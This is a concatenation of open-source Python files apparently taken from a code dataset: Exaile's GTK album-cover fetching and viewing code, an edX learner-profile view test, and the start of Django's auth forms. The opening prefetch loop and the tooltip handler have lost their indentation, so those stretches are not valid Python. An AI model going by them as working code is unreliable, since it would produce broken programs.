albums = sorted(albums)
outstanding = []
# Speed up the following loop
get_cover = COVER_MANAGER.get_cover
default_cover_pixbuf = self.default_cover_pixbuf
cover_size = self.cover_size
self.emit('prefetch-started')
for i, album in enumerate(albums):
if self.stopper.is_set():
return
cover_data = get_cover(self.album_tracks[album][0], set_only=True)
cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None
try:
thumbnail_pixbuf = cover_pixbuf.scale_simple(
*cover_size, interp_type=GdkPixbuf.InterpType.BILINEAR
)
except AttributeError: # cover_pixbuf is None
thumbnail_pixbuf = default_cover_pixbuf
outstanding.append(album)
label = u'{0} - {1}'.format(*album)
iter = self.model.append((album, thumbnail_pixbuf, label))
self.model_path_cache[album] = self.model.get_path(iter)
self.emit('prefetch-progress', i + 1)
self.outstanding = outstanding
self.emit('prefetch-completed', len(self.outstanding))
def fetch(self):
    """
    Collects covers for all outstanding items

    Runs on a worker thread (started as 'CoverFetch'); checks
    ``self.stopper`` between items so the user can abort.
    """
    self.emit('fetch-started', len(self.outstanding))

    # Speed up the following loop
    get_cover = COVER_MANAGER.get_cover
    save = COVER_MANAGER.save

    # Iterate over a shallow copy so fetched albums can be removed from the
    # real list while looping.
    for i, album in enumerate(self.outstanding[:]):
        if self.stopper.is_set():
            # Allow for "fetch-completed" signal to be emitted
            break

        cover_data = get_cover(self.album_tracks[album][0], save_cover=True)
        cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None

        self.emit('fetch-progress', i + 1)

        if not cover_pixbuf:
            continue

        self.outstanding.remove(album)
        self.emit('cover-fetched', album, cover_pixbuf)

        # Persist every 50 fetched covers so progress survives a crash.
        # NOTE(review): i % 50 == 0 is also true at i == 0, so the first
        # iteration triggers one (cheap) extra save.
        if i % 50 == 0:
            logger.debug('Saving cover database')
            save()

    logger.debug('Saving cover database')
    save()

    self.emit('fetch-completed', len(self.outstanding))
def show_cover(self):
    """
    Shows the currently selected cover
    """
    selection = self.previews_box.get_selected_items()
    if not selection:
        return

    album = self.model[selection[0]][0]
    # Any track of the album carries the same cover; use the first one.
    track = self.album_tracks[album][0]
    cover_data = COVER_MANAGER.get_cover(track, set_only=True)
    cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None

    # Do not bother showing the dialog if there is no cover
    if not cover_pixbuf:
        return

    parent_dir = Gio.File.new_for_uri(track.get_loc_for_io()).get_parent()
    savedir = parent_dir.get_path() if parent_dir else parent_dir
    CoverWindow(self.window, cover_pixbuf, album[1], savedir).show_all()
def fetch_cover(self):
    """
    Shows the cover chooser for the currently selected album
    """
    selection = self.previews_box.get_selected_items()
    if not selection:
        return

    path = selection[0]
    album = self.model[path][0]
    chooser = CoverChooser(self.window, self.album_tracks[album][0])
    # Make sure we're updating the correct album after selection
    chooser.path = path
    chooser.connect('cover-chosen', self.on_cover_chosen)
def remove_cover(self):
    """
    Removes the cover of the currently selected album
    """
    selection = self.previews_box.get_selected_items()
    if not selection:
        return

    path = selection[0]
    album = self.model[path][0]
    COVER_MANAGER.remove_cover(self.album_tracks[album][0])
    # Fall back to the placeholder image in the icon view.
    self.model[path][1] = self.default_cover_pixbuf
def do_prefetch_started(self):
    """
    Sets the widget states to prefetching
    """
    # Detach the model while it is cleared and refilled; avoids per-row
    # view updates during the rebuild.
    self.previews_box.set_model(None)
    self.model.clear()
    self.previews_box.set_sensitive(False)
    self.fetch_button.set_sensitive(False)
    self.progress_bar.set_fraction(0)
    # Prefetch reports real progress, so stop the indeterminate pulse timer.
    GLib.source_remove(self.progress_bar.pulse_timeout)
def do_prefetch_completed(self, outstanding):
    """
    Sets the widget states to ready for fetching

    :param outstanding: number of albums still lacking a cover
    """
    self.previews_box.set_sensitive(True)
    # Reattach the model that was detached while prefetching filled it.
    self.previews_box.set_model(self.model)
    self.fetch_button.set_sensitive(True)
    self.progress_bar.set_fraction(0)
    self.progress_bar.set_text(
        self.outstanding_text.format(outstanding=outstanding)
    )
def do_prefetch_progress(self, progress):
    """
    Updates the widgets to reflect the processed album
    """
    # One entry per album in album_tracks; progress counts processed albums.
    total_albums = float(len(self.album_tracks))
    self.progress_bar.set_fraction(progress / total_albums)
def do_fetch_started(self, outstanding):
    """
    Sets the widget states to fetching

    :param outstanding: number of albums that will be fetched
    """
    self.previews_box.set_sensitive(False)
    self.stop_button.set_sensitive(True)
    self.fetch_button.set_sensitive(False)
    self.progress_bar.set_fraction(0)
    # We need float for the fraction during progress
    self.progress_bar.outstanding_total = float(outstanding)
def do_fetch_completed(self, outstanding):
    """
    Sets the widget states to ready for fetching
    """
    self.previews_box.set_sensitive(True)
    self.stop_button.set_sensitive(False)

    # If there are covers left for some reason, allow re-fetch
    covers_left = outstanding > 0
    if covers_left:
        self.fetch_button.set_sensitive(True)

    self.progress_bar.set_fraction(0)
def do_fetch_progress(self, progress):
    """
    Updates the widgets to reflect the processed album
    """
    remaining = len(self.outstanding)
    if remaining:
        text = self.outstanding_text.format(outstanding=remaining)
    else:
        text = self.completed_text
    self.progress_bar.set_text(text)
    # outstanding_total was stored as a float when fetching started.
    self.progress_bar.set_fraction(progress / self.progress_bar.outstanding_total)
def do_cover_fetched(self, album, pixbuf):
    """
    Updates the widgets to reflect the newly fetched cover
    """
    thumbnail = pixbuf.scale_simple(
        *self.cover_size, interp_type=GdkPixbuf.InterpType.BILINEAR
    )
    # The path cache maps albums to their row in the icon-view model.
    self.model[self.model_path_cache[album]][1] = thumbnail
def on_cover_chosen(self, cover_chooser, track, cover_data):
    """
    Updates the cover of the current album after user selection

    NOTE: ``track`` is unused here; the album is identified via the
    chooser's stored model path.
    """
    path = cover_chooser.path
    if path:
        album = self.model[path][0]
        pixbuf = pixbuf_from_data(cover_data)
        self.emit('cover-fetched', album, pixbuf)

        try:
            self.outstanding.remove(album)
        except ValueError:
            # Album was not (or no longer) queued; nothing to recount.
            pass
        else:
            outstanding = len(self.outstanding)
            if outstanding > 0:
                progress_text = self.outstanding_text.format(
                    outstanding=outstanding
                )
            else:
                progress_text = self.completed_text
            self.progress_bar.set_text(progress_text)
def on_previews_box_item_activated(self, iconview, path):
    """
    Shows the currently selected cover
    """
    # Activation (double click / Enter) opens the cover viewer.
    self.show_cover()
def on_previews_box_button_press_event(self, widget, e):
    """
    Shows the cover menu upon click
    """
    # Select whatever item is under the pointer before acting on it.
    clicked_path = self.previews_box.get_path_at_pos(int(e.x), int(e.y))
    if clicked_path:
        self.previews_box.select_path(clicked_path)

    if e.triggers_context_menu():
        self.menu.popup(None, None, None, None, 3, e.time)
def on_previews_box_popup_menu(self, menu):
    """
    Shows the cover menu upon keyboard interaction
    """
    # Only meaningful when an item is selected.
    if self.previews_box.get_selected_items():
        self.menu.popup(None, None, None, None, 0, Gtk.get_current_event_time())
def on_previews_box_query_tooltip(self, widget, x, y, keyboard_mode, tooltip):
"""
Custom tooltip display to prevent markup errors
(e.g. due to album names containing "<")
"""
x, y = self.previews_box.convert_widget_to_bin_window_coords(x, y)
path = self.previews_box.get_path_at_pos(x, y)
if path:
tooltip.set_text(self.model[path][2])
self.previews_box.set_tooltip_item(tooltip, path)
return True
return False
def on_progress_pulse_timeout(self):
    """
    Updates the progress during prefetching
    """
    self.progress_bar.pulse()
    # Returning True keeps the GLib timeout source alive.
    return True
def on_close_button_clicked(self, button):
    """
    Stops the current fetching process and closes the dialog
    """
    # Tell the worker thread to stop before tearing the dialog down.
    self.stopper.set()
    self.window.destroy()

    # Free some memory
    self.model.clear()
    del self.outstanding
    del self.album_tracks
    del self.model_path_cache
def on_stop_button_clicked(self, button):
    """
    Stops the current fetching process
    """
    # Signal the worker thread; it stops at its next checkpoint.
    self.stopper.set()
def on_fetch_button_clicked(self, button):
    """
    Starts the cover fetching process
    """
    # Reset the abort flag left over from a previous run, then fetch
    # on a background thread so the UI stays responsive.
    self.stopper.clear()
    worker = threading.Thread(target=self.fetch, name='CoverFetch')
    worker.daemon = True
    worker.start()
def on_window_delete_event(self, window, e):
    """
    Stops the current fetching process and closes the dialog
    """
    # Route through the close button so its cleanup handler runs.
    self.close_button.clicked()
    # True stops default handling of the delete event.
    return True
class CoverMenu(menu.Menu):
    """
    Context menu with show/fetch/remove actions for a cover widget
    """

    def __init__(self, widget):
        """
        Initializes the menu

        :param widget: the owning widget; must provide show_cover(),
            fetch_cover() and remove_cover()
        """
        menu.Menu.__init__(self, widget)
        self.w = widget

        self.add_simple(_('Show Cover'), self.on_show_clicked)
        self.add_simple(_('Fetch Cover'), self.on_fetch_clicked)
        self.add_simple(_('Remove Cover'), self.on_remove_clicked)

    def on_show_clicked(self, *e):
        """
        Shows the current cover
        """
        self.w.show_cover()

    def on_fetch_clicked(self, *e):
        """
        Opens the cover chooser for the current item
        """
        self.w.fetch_cover()

    def on_remove_clicked(self, *e):
        """
        Removes the current cover from the database
        """
        self.w.remove_cover()
class CoverWidget(Gtk.EventBox):
    """
    Represents the cover widget displayed by the track information
    """

    __gsignals__ = {'cover-found': (GObject.SignalFlags.RUN_LAST, None, (object,))}

    def __init__(self, image):
        """
        Initializes the widget

        :param image: the image to wrap
        :type image: :class:`Gtk.Image`
        """
        GObject.GObject.__init__(self)
        self.image = image
        self.cover_data = None
        self.menu = CoverMenu(self)
        self.menu.attach_to_widget(self)
        # Temporary file used to hand the cover to drag targets.
        self.filename = None

        guiutil.gtk_widget_replace(image, self)
        self.add(self.image)
        self.set_track(None)
        self.image.show()

        event.add_callback(self.on_quit_application, 'quit_application')

        if settings.get_option('gui/use_alpha', False):
            self.set_app_paintable(True)

    def destroy(self):
        """
        Cleanups: removes the drag temp file and the quit callback.
        """
        if self.filename is not None and os.path.exists(self.filename):
            os.remove(self.filename)
            self.filename = None
        # BUGFIX: the callback was registered under 'quit_application'
        # (underscore); removing 'quit-application' (hyphen) silently
        # failed and leaked the callback.
        event.remove_callback(self.on_quit_application, 'quit_application')

    def set_track(self, track):
        """
        Fetches album covers, and displays them
        """
        self.__track = track
        self.set_blank()
        self.drag_dest_set(
            Gtk.DestDefaults.ALL,
            [Gtk.TargetEntry.new('text/uri-list', 0, 0)],
            Gdk.DragAction.COPY | Gdk.DragAction.DEFAULT | Gdk.DragAction.MOVE,
        )

        @common.threaded
        def __get_cover():
            # If automatic fetching is disabled, only use stored covers.
            fetch = not settings.get_option('covers/automatic_fetching', True)
            cover_data = COVER_MANAGER.get_cover(track, set_only=fetch)
            if not cover_data:
                return
            # Hop back onto the main loop before touching widgets.
            GLib.idle_add(self.on_cover_chosen, None, track, cover_data)

        if track is not None:
            __get_cover()

    def show_cover(self):
        """
        Shows the current cover
        """
        if not self.cover_data:
            return
        pixbuf = pixbuf_from_data(self.cover_data)
        if pixbuf:
            savedir = Gio.File.new_for_uri(self.__track.get_loc_for_io()).get_parent()
            if savedir:
                savedir = savedir.get_path()
            window = CoverWindow(
                self.get_toplevel(),
                pixbuf,
                self.__track.get_tag_display('album'),
                savedir,
            )
            window.show_all()

    def fetch_cover(self):
        """
        Fetches a cover for the current track
        """
        if not self.__track:
            return
        window = CoverChooser(self.get_toplevel(), self.__track)
        window.connect('cover-chosen', self.on_cover_chosen)

    def remove_cover(self):
        """
        Removes the cover for the current track from the database
        """
        COVER_MANAGER.remove_cover(self.__track)
        self.set_blank()

    def set_blank(self):
        """
        Sets the default cover to display
        """
        self.drag_dest_unset()
        pixbuf = pixbuf_from_data(COVER_MANAGER.get_default_cover())
        self.image.set_from_pixbuf(pixbuf)
        self.set_drag_source_enabled(False)
        self.cover_data = None

        self.emit('cover-found', None)

    def set_drag_source_enabled(self, enabled):
        """
        Changes the behavior for drag and drop

        :param enabled: Whether to allow drag to other applications
        :type enabled: bool
        """
        # Avoid redundant GTK calls when the state is unchanged.
        if enabled == getattr(self, '__drag_source_enabled', None):
            return

        if enabled:
            self.drag_source_set(
                Gdk.ModifierType.BUTTON1_MASK,
                [Gtk.TargetEntry.new('text/uri-list', 0, 0)],
                Gdk.DragAction.DEFAULT | Gdk.DragAction.MOVE,
            )
        else:
            self.drag_source_unset()

        self.__drag_source_enabled = enabled

    def do_button_press_event(self, event):
        """
        Called when someone clicks on the cover widget
        """
        if self.__track is None or self.get_toplevel() is None:
            return

        if event.type == Gdk.EventType._2BUTTON_PRESS:
            self.show_cover()
        elif event.triggers_context_menu():
            self.menu.popup(event)

    def do_expose_event(self, event):
        """
        Paints alpha transparency

        NOTE(review): expose-event and self.style are GTK2-era API; under
        GTK3 this handler is likely never invoked -- confirm before relying
        on it.
        """
        opacity = 1 - settings.get_option('gui/transparency', 0.3)
        context = self.props.window.cairo_create()
        background = self.style.bg[Gtk.StateType.NORMAL]
        context.set_source_rgba(
            float(background.red) / 256 ** 2,
            float(background.green) / 256 ** 2,
            float(background.blue) / 256 ** 2,
            opacity,
        )
        context.set_operator(cairo.OPERATOR_SOURCE)
        context.paint()

        Gtk.EventBox.do_expose_event(self, event)

    def do_drag_begin(self, context):
        """
        Sets the cover as drag icon
        """
        self.drag_source_set_icon_pixbuf(self.image.get_pixbuf())

    def do_drag_data_get(self, context, selection, info, time):
        """
        Fills the selection with the current cover
        """
        if self.filename is None:
            # Write the cover once to a temp file and reuse it.
            self.filename = tempfile.mkstemp(prefix='exaile_cover_')[1]
            pixbuf = pixbuf_from_data(self.cover_data)
            save_pixbuf(pixbuf, self.filename, 'png')

        selection.set_uris([Gio.File.new_for_path(self.filename).get_uri()])

    def do_drag_data_delete(self, context):
        """
        Cleans up after drag from cover widget
        """
        if self.filename is not None and os.path.exists(self.filename):
            os.remove(self.filename)
            self.filename = None

    def do_drag_data_received(self, context, x, y, selection, info, time):
        """
        Sets the cover based on the dragged data
        """
        if self.__track is not None:
            uri = selection.get_uris()[0]
            db_string = 'localfile:%s' % uri

            try:
                stream = Gio.File.new_for_uri(uri).read()
            except GLib.Error:
                return

            self.cover_data = stream.read()

            width = settings.get_option('gui/cover_width', 100)
            pixbuf = pixbuf_from_data(self.cover_data, (width, width))

            if pixbuf is not None:
                self.image.set_from_pixbuf(pixbuf)
                COVER_MANAGER.set_cover(self.__track, db_string, self.cover_data)

    def on_cover_chosen(self, object, track, cover_data):
        """
        Called when a cover is selected
        from the coverchooser
        """
        if self.__track != track:
            return

        width = settings.get_option('gui/cover_width', 100)
        pixbuf = pixbuf_from_data(cover_data, (width, width))
        self.image.set_from_pixbuf(pixbuf)
        self.set_drag_source_enabled(True)
        self.cover_data = cover_data

        self.emit('cover-found', pixbuf)

    def on_track_tags_changed(self, e, track, tags):
        """
        Updates the displayed cover upon tag changes
        """
        if self.__track == track:
            cover_data = COVER_MANAGER.get_cover(track)
            if not cover_data:
                return
            # BUGFIX: on_cover_chosen expects (object, track, cover_data);
            # the track argument was previously omitted, which made the
            # idle callback raise TypeError.
            GLib.idle_add(self.on_cover_chosen, None, track, cover_data)

    def on_quit_application(self, type, exaile, nothing):
        """
        Cleans up temporary files
        """
        if self.filename is not None and os.path.exists(self.filename):
            os.remove(self.filename)
            self.filename = None
class CoverWindow(object):
    """Shows the cover in a simple image viewer with zoom and save-as."""

    def __init__(self, parent, pixbuf, album=None, savedir=None):
        """Initializes and shows the cover

        :param parent: Parent window to attach to
        :type parent: Gtk.Window
        :param pixbuf: Pixbuf of the cover image
        :type pixbuf: GdkPixbuf.Pixbuf
        :param album: Album title
        :type album: basestring
        :param savedir: Initial directory for the Save As functionality
        :type savedir: basestring
        """
        self.builder = Gtk.Builder()
        self.builder.add_from_file(xdg.get_data_path('ui', 'coverwindow.ui'))
        self.builder.connect_signals(self)

        self.cover_window = self.builder.get_object('CoverWindow')
        self.layout = self.builder.get_object('layout')
        self.toolbar = self.builder.get_object('toolbar')
        self.save_as_button = self.builder.get_object('save_as_button')
        self.zoom_in_button = self.builder.get_object('zoom_in_button')
        self.zoom_out_button = self.builder.get_object('zoom_out_button')
        self.zoom_100_button = self.builder.get_object('zoom_100_button')
        self.zoom_fit_button = self.builder.get_object('zoom_fit_button')
        self.close_button = self.builder.get_object('close_button')
        self.image = self.builder.get_object('image')
        self.statusbar = self.builder.get_object('statusbar')
        self.scrolledwindow = self.builder.get_object('scrolledwindow')
        # Share adjustments so the scrollbars drive the layout viewport.
        self.scrolledwindow.set_hadjustment(self.layout.get_hadjustment())
        self.scrolledwindow.set_vadjustment(self.layout.get_vadjustment())

        if album:
            title = _('Cover for %s') % album
        else:
            title = _('Cover')
        self.savedir = savedir

        self.cover_window.set_title(title)
        self.cover_window.set_transient_for(parent)
        self.cover_window_width = 500
        tb_min_height, tb_natural_height = self.toolbar.get_preferred_height()
        sb_min_height, sb_natural_height = self.statusbar.get_preferred_height()
        # Reserve room for toolbar and statusbar around a 500x500 image area.
        self.cover_window_height = 500 + tb_natural_height + sb_natural_height
        self.cover_window.set_default_size(
            self.cover_window_width, self.cover_window_height
        )

        self.image_original_pixbuf = pixbuf
        self.image_pixbuf = self.image_original_pixbuf
        # Zoom limits (percent) and the multiplicative zoom step.
        self.min_percent = 1
        self.max_percent = 500
        self.ratio = 1.5
        self.image_interp = GdkPixbuf.InterpType.BILINEAR
        # While True, the zoom tracks the window size ("fit" mode).
        self.image_fitted = True
        self.set_ratio_to_fit()
        self.update_widgets()

    def show_all(self):
        # Delegates to the underlying toplevel window.
        self.cover_window.show_all()

    def available_image_width(self):
        """Returns the available horizontal space for the image"""
        return self.cover_window.get_size()[0]

    def available_image_height(self):
        """Returns the available vertical space for the image"""
        tb_min_height, tb_natural_height = self.toolbar.get_preferred_height()
        sb_min_height, sb_natural_height = self.statusbar.get_preferred_height()
        return self.cover_window.get_size()[1] - tb_natural_height - sb_natural_height

    def center_image(self):
        """Centers the image in the layout"""
        new_x = max(
            0, int((self.available_image_width() - self.image_pixbuf.get_width()) / 2)
        )
        new_y = max(
            0, int((self.available_image_height() - self.image_pixbuf.get_height()) / 2)
        )
        self.layout.move(self.image, new_x, new_y)

    def update_widgets(self):
        """Updates image, layout, scrolled window, tool bar and status bar"""
        window = self.cover_window.get_window()
        # Freeze redraws while several widgets change to avoid flicker.
        if window:
            window.freeze_updates()

        self.apply_zoom()

        self.layout.set_size(
            self.image_pixbuf.get_width(), self.image_pixbuf.get_height()
        )

        # No scrollbars when the image fits exactly (or fit mode is active).
        if self.image_fitted or (
            self.image_pixbuf.get_width() == self.available_image_width()
            and self.image_pixbuf.get_height() == self.available_image_height()
        ):
            self.scrolledwindow.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.NEVER)
        else:
            self.scrolledwindow.set_policy(
                Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC
            )

        percent = int(100 * self.image_ratio)
        message = (
            str(self.image_original_pixbuf.get_width())
            + " x "
            + str(self.image_original_pixbuf.get_height())
            + " pixels "
            + str(percent)
            + '%'
        )

        self.zoom_in_button.set_sensitive(percent < self.max_percent)
        self.zoom_out_button.set_sensitive(percent > self.min_percent)

        self.statusbar.pop(self.statusbar.get_context_id(''))
        self.statusbar.push(self.statusbar.get_context_id(''), message)
        self.image.set_from_pixbuf(self.image_pixbuf)
        self.center_image()

        if window:
            window.thaw_updates()

    def apply_zoom(self):
        """Scales the image if needed"""
        new_width = int(self.image_original_pixbuf.get_width() * self.image_ratio)
        new_height = int(self.image_original_pixbuf.get_height() * self.image_ratio)
        # Skip rescaling when the target size is already current.
        if (
            new_width != self.image_pixbuf.get_width()
            or new_height != self.image_pixbuf.get_height()
        ):
            self.image_pixbuf = self.image_original_pixbuf.scale_simple(
                new_width, new_height, self.image_interp
            )

    def set_ratio_to_fit(self):
        """Calculates and sets the needed ratio to show the full image"""
        width_ratio = (
            float(self.image_original_pixbuf.get_width()) / self.available_image_width()
        )
        height_ratio = (
            float(self.image_original_pixbuf.get_height())
            / self.available_image_height()
        )
        # Never scale above 100%; shrink by the dominant dimension.
        self.image_ratio = 1 / max(1, width_ratio, height_ratio)

    def on_key_press(self, widget, event, data=None):
        """
        Closes the cover window when Escape or Ctrl+W is pressed
        """
        if event.keyval == Gdk.KEY_Escape or (
            event.state & Gdk.ModifierType.CONTROL_MASK and event.keyval == Gdk.KEY_w
        ):
            widget.destroy()

    def on_save_as_button_clicked(self, widget):
        """
        Saves image to user-specified location
        """
        dialog = Gtk.FileChooserDialog(
            _("Save File"),
            self.cover_window,
            Gtk.FileChooserAction.SAVE,
            (
                Gtk.STOCK_CANCEL,
                Gtk.ResponseType.CANCEL,
                Gtk.STOCK_SAVE,
                Gtk.ResponseType.ACCEPT,
            ),
        )
        # Default file name follows the user's preferred cover names.
        names = settings.get_option('covers/localfile/preferred_names')
        filename = (names[0] if names else 'cover') + '.png'
        dialog.set_current_name(filename)
        if self.savedir:
            dialog.set_current_folder(self.savedir)
        if dialog.run() == Gtk.ResponseType.ACCEPT:
            filename = dialog.get_filename()
            lowfilename = filename.lower()
            # Pick the output codec from the chosen extension.
            if lowfilename.endswith('.jpg') or lowfilename.endswith('.jpeg'):
                type_ = 'jpeg'
            else:
                type_ = 'png'
            save_pixbuf(self.image_pixbuf, filename, type_)
        dialog.destroy()

    def on_zoom_in_button_clicked(self, widget):
        """
        Zooms into the image
        """
        self.image_fitted = False
        self.image_ratio *= self.ratio
        self.update_widgets()

    def on_zoom_out_button_clicked(self, widget):
        """
        Zooms out of the image
        """
        self.image_fitted = False
        self.image_ratio *= 1 / self.ratio
        self.update_widgets()

    def on_zoom_100_button_clicked(self, widget):
        """
        Restores the original image zoom
        """
        self.image_fitted = False
        self.image_ratio = 1
        self.update_widgets()

    def on_zoom_fit_button_clicked(self, widget):
        """
        Zooms the image to fit the window width
        """
        self.image_fitted = True
        self.set_ratio_to_fit()
        self.update_widgets()

    def on_close_button_clicked(self, widget):
        """
        Hides the window
        """
        self.cover_window.hide()

    def cover_window_size_allocate(self, widget, allocation):
        # Re-fit the image when the window size actually changed.
        if (
            self.cover_window_width != allocation.width
            or self.cover_window_height != allocation.height
        ):
            if self.image_fitted:
                self.set_ratio_to_fit()
            self.update_widgets()
            self.cover_window_width = allocation.width
            self.cover_window_height = allocation.height
class CoverChooser(GObject.GObject):
    """
    Fetches all album covers for a string, and allows the user to choose
    one out of the list
    """

    __gsignals__ = {
        'covers-fetched': (GObject.SignalFlags.RUN_LAST, None, (object,)),
        'cover-chosen': (GObject.SignalFlags.RUN_LAST, None, (object, object)),
    }

    def __init__(self, parent, track, search=None):
        """
        Expects the parent control, a track, and an optional search string
        """
        GObject.GObject.__init__(self)
        self.parent = parent

        self.builder = Gtk.Builder()
        self.builder.add_from_file(xdg.get_data_path('ui', 'coverchooser.ui'))
        self.builder.connect_signals(self)
        self.window = self.builder.get_object('CoverChooser')
        self.window.set_title(
            _("Cover options for %(artist)s - %(album)s")
            % {
                'artist': track.get_tag_display('artist'),
                'album': track.get_tag_display('album'),
            }
        )
        self.window.set_transient_for(parent)

        self.message = dialogs.MessageBar(
            parent=self.builder.get_object('main_container'),
            buttons=Gtk.ButtonsType.CLOSE,
        )
        self.message.connect('response', self.on_message_response)

        self.track = track
        self.covers = []
        self.current = 0

        self.cover = guiutil.ScalableImageWidget()
        self.cover.set_image_size(350, 350)

        self.cover_image_box = self.builder.get_object('cover_image_box')

        self.stack = self.builder.get_object('stack')
        self.stack_ready = self.builder.get_object('stack_ready')

        self.size_label = self.builder.get_object('size_label')
        self.source_label = self.builder.get_object('source_label')

        self.covers_model = self.builder.get_object('covers_model')
        self.previews_box = self.builder.get_object('previews_box')
        self.previews_box.set_no_show_all(True)
        self.previews_box.hide()
        # Model stays detached until the worker thread has filled it.
        self.previews_box.set_model(None)

        self.set_button = self.builder.get_object('set_button')
        self.set_button.set_sensitive(False)

        self.window.show_all()

        self.stopper = threading.Event()
        # NOTE(review): unlike the other cover worker threads, this one is
        # not marked daemon -- it could keep the process alive; confirm.
        self.fetcher_thread = threading.Thread(
            target=self.fetch_cover, name='Coverfetcher'
        )
        self.fetcher_thread.start()

    def fetch_cover(self):
        """
        Searches for covers for the current track

        Runs on the fetcher thread; emits 'covers-fetched' when done.
        """
        db_strings = COVER_MANAGER.find_covers(self.track)

        if db_strings:
            for db_string in db_strings:
                if self.stopper.is_set():
                    return

                coverdata = COVER_MANAGER.get_cover_data(db_string)
                # Pre-render everything for faster display later
                pixbuf = pixbuf_from_data(coverdata)

                if pixbuf:
                    self.covers_model.append(
                        [
                            (db_string, coverdata),
                            pixbuf,
                            pixbuf.scale_simple(50, 50, GdkPixbuf.InterpType.BILINEAR),
                        ]
                    )

        self.emit('covers-fetched', db_strings)

    def do_covers_fetched(self, db_strings):
        """
        Finishes the dialog setup after all covers have been fetched
        """
        if self.stopper.is_set():
            return

        self.stack.set_visible_child(self.stack_ready)
        self.previews_box.set_model(self.covers_model)

        if db_strings:
            self.cover_image_box.pack_start(self.cover, True, True, 0)
            self.cover.show()

            self.set_button.set_sensitive(True)

            # Show thumbnail bar if more than one cover was found
            if len(db_strings) > 1:
                self.previews_box.set_no_show_all(False)
                self.previews_box.show_all()

            # Try to select the current cover of the track, fallback to first
            track_db_string = COVER_MANAGER.get_db_string(self.track)
            position = (
                db_strings.index(track_db_string)
                if track_db_string in db_strings
                else 0
            )
            self.previews_box.select_path(Gtk.TreePath(position))
        else:
            self.builder.get_object('stack').hide()
            self.builder.get_object('actions_box').hide()
            self.message.show_warning(
                _('No covers found.'),
                _(
                    'None of the enabled sources has a cover for this track, try enabling more sources.'
                ),
            )

    def on_cancel_button_clicked(self, button):
        """
        Closes the cover chooser
        """
        # Notify the fetcher thread to stop
        self.stopper.set()

        self.window.destroy()

    def on_set_button_clicked(self, button):
        """
        Chooses the current cover and saves it to the database
        """
        paths = self.previews_box.get_selected_items()

        if paths:
            path = paths[0]
            # Column 0 holds the (db_string, coverdata) pair.
            coverdata = self.covers_model[path][0]

            COVER_MANAGER.set_cover(self.track, coverdata[0], coverdata[1])

            self.emit('cover-chosen', self.track, coverdata[1])
            self.window.destroy()

    def on_previews_box_selection_changed(self, iconview):
        """
        Switches the currently displayed cover
        """
        paths = self.previews_box.get_selected_items()

        if paths:
            path = paths[0]
            db_string = self.covers_model[path][0]
            # db_string[0] is like 'source:identifier'.
            source = db_string[0].split(':', 1)[0]
            provider = providers.get_provider('covers', source)

            pixbuf = self.covers_model[path][1]
            self.cover.set_image_pixbuf(pixbuf)
            self.size_label.set_text(
                _('{width}x{height} pixels').format(
                    width=pixbuf.get_width(), height=pixbuf.get_height()
                )
            )
            # Display readable title of the provider, fallback to its name
            self.source_label.set_text(getattr(provider, 'title', source))
            self.set_button.set_sensitive(True)
        else:
            self.set_button.set_sensitive(False)

    def on_previews_box_item_activated(self, iconview, path):
        """
        Triggers selecting the current cover
        """
        self.set_button.clicked()

    def on_message_response(self, widget, response):
        """
        Handles the response for closing
        """
        if response == Gtk.ResponseType.CLOSE:
            self.window.destroy()
| gpl-2.0 |
bigdatauniversity/edx-platform | lms/djangoapps/student_profile/test/test_views.py | 113 | 3370 | # -*- coding: utf-8 -*-
""" Tests for student profile views. """
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.test.client import RequestFactory
from util.testing import UrlResetMixin
from student.tests.factories import UserFactory
from student_profile.views import learner_profile_context
class LearnerProfileViewTest(UrlResetMixin, TestCase):
    """ Tests for the student profile view. """

    USERNAME = "username"
    PASSWORD = "password"
    CONTEXT_DATA = [
        'default_public_account_fields',
        'accounts_api_url',
        'preferences_api_url',
        'account_settings_page_url',
        'has_preferences_access',
        'own_profile',
        'country_options',
        'language_options',
        'account_settings_data',
        'preferences_data',
    ]

    def setUp(self):
        super(LearnerProfileViewTest, self).setUp()
        self.user = UserFactory.create(username=self.USERNAME, password=self.PASSWORD)
        self.client.login(username=self.USERNAME, password=self.PASSWORD)

    def test_context(self):
        """
        Verify learner profile page context data.
        """
        request = RequestFactory().get('/url')
        request.user = self.user

        context = learner_profile_context(request, self.USERNAME, self.user.is_staff)
        data = context['data']

        # Table of context keys and their expected values.
        username_kwargs = {'username': self.user.username}
        expected_values = [
            (
                'default_public_account_fields',
                settings.ACCOUNT_VISIBILITY_CONFIGURATION['public_fields'],
            ),
            ('accounts_api_url', reverse("accounts_api", kwargs=username_kwargs)),
            ('preferences_api_url', reverse('preferences_api', kwargs=username_kwargs)),
            (
                'profile_image_upload_url',
                reverse("profile_image_upload", kwargs=username_kwargs),
            ),
            (
                'profile_image_remove_url',
                reverse('profile_image_remove', kwargs=username_kwargs),
            ),
            ('profile_image_max_bytes', settings.PROFILE_IMAGE_MAX_BYTES),
            ('profile_image_min_bytes', settings.PROFILE_IMAGE_MIN_BYTES),
            ('account_settings_page_url', reverse('account_settings')),
        ]
        for key, expected in expected_values:
            self.assertEqual(data[key], expected)

        for attribute in self.CONTEXT_DATA:
            self.assertIn(attribute, data)

    def test_view(self):
        """
        Verify learner profile page view.
        """
        response = self.client.get(
            path=reverse('learner_profile', kwargs={'username': self.USERNAME})
        )

        for attribute in self.CONTEXT_DATA:
            self.assertIn(attribute, response.content)

    def test_undefined_profile_page(self):
        """
        Verify that a 404 is returned for a non-existent profile page.
        """
        response = self.client.get(
            path=reverse('learner_profile', kwargs={'username': "no_such_user"})
        )
        self.assertEqual(404, response.status_code)
| agpl-3.0 |
nathanial/lettuce | tests/integration/lib/Django-1.2.5/django/contrib/auth/forms.py | 44 | 8781 | from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.models import get_current_site
from django.template import Context, loader
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils.http import int_to_base36
class UserCreationForm(forms.ModelForm):
    """
    A form that creates a user, with no privileges, from the given username and password.
    """
    username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^[\w.@+-]+$',
        help_text = _("Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only."),
